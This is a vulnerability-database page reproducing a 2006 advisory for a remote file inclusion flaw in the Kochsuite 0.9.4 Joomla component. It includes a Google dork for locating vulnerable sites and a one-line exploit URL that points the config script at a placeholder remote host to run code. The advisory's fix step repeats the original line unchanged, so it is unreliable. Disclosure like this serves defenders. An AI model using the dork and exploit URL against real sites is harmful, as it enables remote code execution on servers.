header-logo
Suggest Exploit
vendor:
Kochsuite
by:
camino
6,4
CVSS
MEDIUM
Remote File Inclusion
98
CWE
Product Name: Kochsuite
Affected Version From: 0.9.4
Affected Version To: 0.9.4
Patch Exists: NO
Related CWE: N/A
CPE: a:vegisto:kochsuite:0.9.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Kochsuite v0.9.4 Remote File Inclusion Vulnerability

Kochsuite v0.9.4 is vulnerable to a Remote File Inclusion vulnerability. This vulnerability is caused due to the lack of proper input validation in the 'config.kochsuite.php' script. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable script. This will allow the attacker to execute arbitrary code on the vulnerable system.

Mitigation:

The vulnerability can be mitigated by properly validating user input in the 'config.kochsuite.php' script. Additionally, the script should be configured to only accept input from trusted sources.
Source

Exploit-DB raw data:

    .:[ insecurity research team ]:.
     .__..____.:.______.____.:.____ .
 .:. |  |/    \:/  ___// __ \:/   _\.:.
   : |  |   |  \\____\\  ___/\   /__ :. .
 ..: |__|___|  /____  >\___  >\___  >.:
   .:.. ..  .\/   .:\/:.  .\/.  .:\/:
 .   ...:.    .advisory.    .:...
         :..................: 18.o8.2oo6 ..
 
 
  Affected Application: Kochsuite v0.9.4

       (Mambo/Joomla CMS Component)
 
 
 . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  Discoverd by: camino
 
  Team: Insecurity Research Team
 
  URL: http://www.insecurityresearch.org
 
  E-Mail: camino[at]sexmagnet[dot]com
 
 
 
 . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
 
 
  Typ: Remote [x]  Local [ ]
 
       Remote File Inclusion [x]  SQL Injection [ ]
 
  Level: Low [ ]  Middle [x]  High [ ]
 
  Application: Kochsuite
 
  Version: 0.9.4
 
  Vulnerable File: config.kochsuite.php
 
  URL: http://www.vegisto.com
 
  Description: It's a component for chiefs to publish theirs stuff...
 
  Dork: inurl:"com_kochsuite"
 
 
 
 . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


  http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://huh?
 
 
 . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  o1.) open config.kochsuite.php
 
  o2.) take a look at line 46:

         # Don't allow direct linking    defined( '_VALID_MOS' ) or 

         die( 'Direct Access to this location is not allowed.' );

  o3.) take a look at line 47:

         require_once ($mosConfig_absolute_path.'/administrator/

         components/com_kochsuite/includes/letters.inc');
 
  o4.) change line 46:

         defined( '_VALID_MOS' ) or 

         die( 'Direct Access to this location is not allowed.' );
 
 
 
 . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)

# milw0rm.com [2006-08-18]